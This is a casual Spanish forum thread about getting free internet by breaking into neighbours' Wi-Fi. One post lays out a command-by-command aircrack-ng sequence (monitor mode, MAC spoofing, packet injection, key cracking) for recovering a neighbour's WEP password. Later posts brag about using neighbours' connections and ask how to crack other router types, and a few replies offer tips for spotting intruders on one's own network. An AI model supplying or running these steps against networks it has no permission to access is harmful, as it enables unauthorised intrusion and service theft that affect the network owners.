Juankers, me quedo sin internet

Culas Grijander rebuznó:
Cojones, esto me pasa por ansias. Me he leido las líneas que te salen y le he dado a "no hard disk" y me ha entrado a la perfección. Apunto he estado de enviarle este mensaje desde Linux, que trae Firefox incorporado, pero no recordaba mi clave de acceso a internec (la tengo apuntada en el bloc de notas de windows :lol:) así que no pude conectar. Voy a tener que meterle mano a Linux a ver si aprendo a manejarme con él.

Si tu supieras el 50% de las cosas malignas que se pueden hacer con el BT estarias morreandote al kernel de Linux :lol:

Aprende, mamon. Y lo que no sepas pregunta en el hilo de Linux.

Pa que luego digais que solo sabemos poner el ordenador de la lavadora (cabrones...):

Os bajais el Backtrack 4 y lo instalais en un usb de 8 gigas con el unetbootin, lo meteis y reinicias y blablabla root toor, vais a la pantallita negra esa y poneis esto:

airmon-ng
airmon-ng stop nombredetuputared
ifconfig nombredered down
macchanger -r nombrered
ifconfig nombredered up
airmon-ng start nombredetuputared
airodump-ng red (si no va con la de antes fijate que no actua a traves de otra despues de lo de macchanger, sale en la puta pantalla) (ya salen tus vecinos, busca un que sea WEP)
airodump-ng --channel numerocanal -w nombredelarchivo -bssid macdelvecino nombrereddelatuyagilipollas

Abre otra pantallita negra de esas y no cierres las otras gañan!!

aireplay-ng -1 -0 -a macvecino -h macchangertuyotiocuandopusisteesodemacchangermenoserreytediounosnumeritos -e nombredelaredatacada nombrered

Abre otra pantallita negra de esas y no cierres las otras gañan!! si, otra

aireplay-ng -3 -b macvecino -h macchangertuyotiocuandopusisteesodemacchangermenoserreytediounosnumeritos nombrered

Abre otra pantallita negra de esas y no cierres las otras gañan!! si, otra

Cuando tengas 20 mil paquetes de esos, o antes, a mi me salio con 12 mil, pones

aircrack-ng nombredelarchivo-01.cap

ding
ding
ding
ding

PREMIO!!

te sale pass => hi:jo:de:fu:ta => el pass seria hijodefuta

Internec gratis :121

Joder que ganas de complicarse cuando el wifiway te lo hace todo solo con 4 clicks guarros :lol:

Feverish rebuznó:
Joder que ganas de complicarse cuando el wifiway te lo hace todo solo con 4 clicks guarros :lol:

Yo he usado el Wifislax por el soporte que tiene para IPW2200, sabes si el Wifiway tambien soporta ese chipset para inyección?

Krakenjitsu rebuznó:
Yo he usado el Wifislax por el soporte que tiene para IPW2200, sabes si el Wifiway tambien soporta ese chipset para inyección?

Yo creo que lleva casi los mismos que wifiway

Resubo este hilo amérrimo para preguntar si hay alguna forma de saber si me estan robando el wifi. Es que últimamente me va como el culo y el router tiene las lucecitas como loco todo el tiempo.

Ya pero es que me da pereza cambiarle la contraseña a 4 pcs, la psp y 2 moviles. :sad:

Quentin rebuznó:
Resubo este hilo amérrimo para preguntar si hay alguna forma de saber si me estan robando el wifi. Es que últimamente me va como el culo y el router tiene las lucecitas como loco todo el tiempo.

Hay un programa llamado "wifidefense" que te dice quiénes están accediendo a tu router. Asegúrate que los que te salen sean todos de tu casa (por ejemplo a mí me sale la play3, el pc de mi madre, el de mi hermano). A los que conoces los puedes renombrar para saber quienes son y no tener que estar mirando la IP.

YoHiceARoqueIII rebuznó:

Aquí tiene ustec:

Angelina-Jolie.jpg

cambia el nombre de la red, ponle algo chungo como 'si me sigues robando la internes te quito la publicidad del carreful del buzón' siempre funciona

:121:121

Ahora me da igual porque me largo de sevilla en Semana Santa, intentaré vuestros trucos a la vuelta.

Mira la tabla DHCP en el router por si ves algo raro. Si te esta mangando la wifi alguien que sepa un poquito, usa el programa Wireshark para analizar el trafico.

Hola niños. Mi conexión es lo puto peor, cortes de servicio todos los días y cuando se supone que va bien sigue siendo un asco. Con el wifiway he obtenido la desinteresada colaboración de dos de mis vecinos, que me suministran internet cuando en mi casa peta, pero me parece que no es suficiente, creo que deberían esforzarse más y pagar una conexión mejor.

El wifiway me detecta unas 81 redes en mi área (jodeos y tal), entre ellas hay 3 0no cercanas que me están provocando, pero no he encontrado mucha mucha info al respecto. En el programilla ese del wifiway que te guía paso a paso no hay un método específico para redes 0no, y el método general no me rula. ¿Qué puedo hacer para extraer claves de redes que no sean Wlan o jazztel? Tráfico de paquetes hay suficiente, es más, este finde me voy de viaje y puedo dejar el ordenador tirando 3 días si fuese necesario, pero ya lo dejé un día entero con resultado nulo.

Atrás
Arriba Pie